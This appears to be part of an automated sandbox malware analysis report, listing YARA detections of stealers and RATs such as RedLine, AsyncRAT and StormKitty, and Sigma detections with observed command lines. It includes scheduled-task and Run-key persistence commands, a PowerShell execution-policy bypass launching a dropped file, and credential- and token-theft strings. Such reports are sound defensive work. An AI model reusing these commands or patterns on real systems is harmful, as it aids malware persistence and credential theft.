Process Memory Space: 62AB.tmp.build.exe PID: 7672	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: svchost.exe PID: 7952	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: svchost.exe PID: 7952	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: svchost.exe PID: 7952	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: svchost.exe PID: 7952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 7952	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: svchost.exe PID: 7952	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
Process Memory Space: svchost.exe PID: 7952	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x522ab:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: svchost.exe PID: 7952	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x32900:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: svchost.exe PID: 7952	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x18beb:$x1: AsyncRAT 0x18c1d:$x1: AsyncRAT 0x1a90f:$x1: AsyncRAT 0x1a941:$x1: AsyncRAT 0x37319:$x1: AsyncRAT 0x3734b:$x1: AsyncRAT 0x373b3:$x1: AsyncRAT 0x59902:$x1: AsyncRAT 0x59934:$x1: AsyncRAT 0x59968:$x1: AsyncRAT 0x8fce3:$x1: AsyncRAT 0x8fd15:$x1: AsyncRAT 0x9b101:$x1: AsyncRAT 0x9b133:$x1: AsyncRAT 0x9f08a:$x1: AsyncRAT 0x9f0bc:$x1: AsyncRAT 0x226f2:$s4: Stub.exe 0x518b4:$s6: VirtualBox 0x1b16e:$s8: Win32_ComputerSystem 0x33f00:$s8: Win32_ComputerSystem 0x51863:$s8: Win32_ComputerSystem
Process Memory Space: accc.exe PID: 6896	JoeSecurity_KeyzetsuClipper	Yara detected Keyzetsu Clipper	Joe Security
Process Memory Space: jqnnpe.exe PID: 5184	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: jqnnpe.exe PID: 5184	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jqnnpe.exe PID: 5184	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jqnnpe.exe PID: 5184	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
Process Memory Space: jqnnpe.exe PID: 5184	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x18df:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: svchost.exe PID: 796	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x62e4:$x1: AsyncRAT 0x6316:$x1: AsyncRAT 0x28a96:$x1: AsyncRAT 0x28ac8:$x1: AsyncRAT
Click to see the 133 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.2.svchost.exe.6a20000.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.explorer.exe.8b90000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1245e:$s2: ReflectiveLoader@
2.0.explorer.exe.8cb0000.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1325e:$s2: ReflectiveLoader@
14.0.5087.tmp.update.exe.6f0000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.0.5087.tmp.update.exe.6f0000.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xa25b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xb638:$a2: Stub.exe 0xb6c8:$a2: Stub.exe 0x6ee8:$a3: get_ActivatePong 0xa473:$a4: vmware 0xa2eb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7c89:$a6: get_SslClient
14.0.5087.tmp.update.exe.6f0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa2ed:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
2.2.explorer.exe.8cb0000.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1325e:$s2: ReflectiveLoader@
24.2.svchost.exe.6d60000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.0.62AB.tmp.build.exe.a70000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.explorer.exe.8cb0000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1245e:$s2: ReflectiveLoader@
2.0.explorer.exe.8b90000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1165e:$s2: ReflectiveLoader@
2.2.explorer.exe.f3c0000.3.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3a02a:$s2: ReflectiveLoader@
2.2.explorer.exe.c350000.2.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3a02a:$s2: ReflectiveLoader@
2.0.explorer.exe.c350000.2.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3a02a:$s2: ReflectiveLoader@
10.0.4BC4.tmp.Client.exe.ac0000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
10.0.4BC4.tmp.Client.exe.ac0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.0.4BC4.tmp.Client.exe.ac0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.0.4BC4.tmp.Client.exe.ac0000.0.unpack	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
10.0.4BC4.tmp.Client.exe.ac0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47754:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
10.0.4BC4.tmp.Client.exe.ac0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x4a797:$s1: \VPN\NordVPN 0x4a83b:$s1: \VPN\NordVPN 0x4a8fb:$s2: \VPN\OpenVPN 0x4a969:$s3: \VPN\ProtonVPN
10.0.4BC4.tmp.Client.exe.ac0000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa90:$x2: https://github.com/LimerBoy/StormKitty 0xaac:$x3: StormKitty 0x37ea3:$s1: GetBSSID 0x3e928:$s2: GetAntivirus 0x49b8e:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x4b5f9:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x4b82b:$s6: "encrypted_key":"(.*?)"
10.0.4BC4.tmp.Client.exe.ac0000.0.unpack	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x475a5:$s6: Content-Disposition: form-data; name="document"; filename=" 0x4ac67:$s11: \Ethereum\keystore 0x45ca2:$v1_5: sharedSecret 0x4889c:$v1_6: ":"([^"]+)" 0x3d9ae:$v1_8: WritePasswords 0x3e1d1:$v1_9: sGeckoBrowserPaths 0x39526:$v1_10: get_sPassword
2.0.explorer.exe.8b90000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1245e:$s2: ReflectiveLoader@
19.0.5E16.tmp.aaa.exe.620000.0.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
19.0.5E16.tmp.aaa.exe.620000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xd118:$q1: Select * from Win32_CacheMemory 0xd158:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xd1a6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xd1f4:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
39.0.jqnnpe.exe.230000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
39.0.jqnnpe.exe.230000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
39.0.jqnnpe.exe.230000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
39.0.jqnnpe.exe.230000.0.unpack	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
39.0.jqnnpe.exe.230000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x476af:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
39.0.jqnnpe.exe.230000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x4a6f2:$s1: \VPN\NordVPN 0x4a796:$s1: \VPN\NordVPN 0x4a856:$s2: \VPN\OpenVPN 0x4a8c4:$s3: \VPN\ProtonVPN
39.0.jqnnpe.exe.230000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa90:$x2: https://github.com/LimerBoy/StormKitty 0xaac:$x3: StormKitty 0x49ae9:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x4b554:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x4b786:$s6: "encrypted_key":"(.*?)"
6.0.4336.tmp.Server.exe.190000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.0.4336.tmp.Server.exe.190000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
6.0.4336.tmp.Server.exe.190000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.0.4336.tmp.Server.exe.190000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.0.4336.tmp.Server.exe.190000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.0.4336.tmp.Server.exe.190000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
6.0.4336.tmp.Server.exe.190000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
6.0.4336.tmp.Server.exe.190000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
6.0.4336.tmp.Server.exe.190000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.0.4336.tmp.Server.exe.190000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
24.2.svchost.exe.3a15198.1.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
24.2.svchost.exe.3a15198.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.svchost.exe.3a15198.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
24.2.svchost.exe.3a15198.1.raw.unpack	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
24.2.svchost.exe.3a15198.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x476af:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
24.2.svchost.exe.3a15198.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x4a6f2:$s1: \VPN\NordVPN 0x4a796:$s1: \VPN\NordVPN 0x4a856:$s2: \VPN\OpenVPN 0x4a8c4:$s3: \VPN\ProtonVPN
24.2.svchost.exe.3a15198.1.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa90:$x2: https://github.com/LimerBoy/StormKitty 0xaac:$x3: StormKitty 0x37ea3:$s1: GetBSSID 0x3e928:$s2: GetAntivirus 0x49ae9:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x4b554:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x4b786:$s6: "encrypted_key":"(.*?)"
24.2.svchost.exe.3a15198.1.raw.unpack	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x47500:$s6: Content-Disposition: form-data; name="document"; filename=" 0x4abc2:$s11: \Ethereum\keystore 0x45bfd:$v1_5: sharedSecret 0x487f7:$v1_6: ":"([^"]+)" 0x3d9ae:$v1_8: WritePasswords 0x3e1d1:$v1_9: sGeckoBrowserPaths 0x39526:$v1_10: get_sPassword
24.2.svchost.exe.3950838.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.5087.tmp.update.exe.2aa51fc.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.2.5087.tmp.update.exe.2aa51fc.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x845b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9838:$a2: Stub.exe 0x98c8:$a2: Stub.exe 0x50e8:$a3: get_ActivatePong 0x8673:$a4: vmware 0x84eb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x5e89:$a6: get_SslClient
14.2.5087.tmp.update.exe.2aa51fc.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x84ed:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
24.2.svchost.exe.3950838.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
24.2.svchost.exe.6c60000.4.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
24.2.svchost.exe.6c60000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
24.2.svchost.exe.6c60000.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x530d2:$s1: file:/// 0x52fda:$s2: {11111-22222-10009-11112} 0x53062:$s3: {11111-22222-50001-00000} 0x4d4fc:$s4: get_Module 0x4d9bb:$s5: Reverse 0x52991:$s6: BlockCopy 0x52ad4:$s7: ReadByte 0x530e4:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
2.2.explorer.exe.8b90000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1165e:$s2: ReflectiveLoader@
24.2.svchost.exe.6c60000.4.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
24.2.svchost.exe.6c60000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
24.2.svchost.exe.6c60000.4.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x512d2:$s1: file:/// 0x511da:$s2: {11111-22222-10009-11112} 0x51262:$s3: {11111-22222-50001-00000} 0x4b6fc:$s4: get_Module 0x4bbbb:$s5: Reverse 0x50b91:$s6: BlockCopy 0x50cd4:$s7: ReadByte 0x512e4:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
24.2.svchost.exe.6d60000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.0.explorer.exe.8cb0000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1245e:$s2: ReflectiveLoader@
2.2.explorer.exe.c350000.2.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x38a2a:$s2: ReflectiveLoader@
2.0.explorer.exe.c350000.2.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x38a2a:$s2: ReflectiveLoader@
24.2.svchost.exe.3a15198.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.svchost.exe.3a15198.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
24.2.svchost.exe.3a15198.1.unpack	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
24.2.svchost.exe.3a15198.1.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x458af:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
24.2.svchost.exe.3a15198.1.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x488f2:$s1: \VPN\NordVPN 0x48996:$s1: \VPN\NordVPN 0x48a56:$s2: \VPN\OpenVPN 0x48ac4:$s3: \VPN\ProtonVPN
24.2.svchost.exe.3a15198.1.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x360a3:$s1: GetBSSID 0x3cb28:$s2: GetAntivirus 0x47ce9:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x49754:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x49986:$s6: "encrypted_key":"(.*?)"
24.2.svchost.exe.3a15198.1.unpack	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x45700:$s6: Content-Disposition: form-data; name="document"; filename=" 0x48dc2:$s11: \Ethereum\keystore 0x43dfd:$v1_5: sharedSecret 0x469f7:$v1_6: ":"([^"]+)" 0x3bbae:$v1_8: WritePasswords 0x3c3d1:$v1_9: sGeckoBrowserPaths 0x37726:$v1_10: get_sPassword
14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xa25b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xb638:$a2: Stub.exe 0xb6c8:$a2: Stub.exe 0x6ee8:$a3: get_ActivatePong 0xa473:$a4: vmware 0xa2eb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7c89:$a6: get_SslClient
2.2.explorer.exe.f3c0000.3.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3b62a:$s2: ReflectiveLoader@
Click to see the 72 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, ProcessId: 7408, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7548, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , ProcessId: 7468, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7816, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7952, ProcessName: svchost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\xj40xovMsm.exe, ProcessId: 6784, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Service_Adobe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\xj40xovMsm.exe, ProcessId: 6784, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Adobe.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe, ParentProcessId: 6828, ParentProcessName: 3CBD.tmp.Installer.exe, ProcessCommandLine: "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f, ProcessId: 2180, ProcessName: schtasks.exe

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, ProcessId: 5720, TargetFilename: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7816, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7952, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7548, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , ProcessId: 7468, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3244, ProcessName: svchost.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

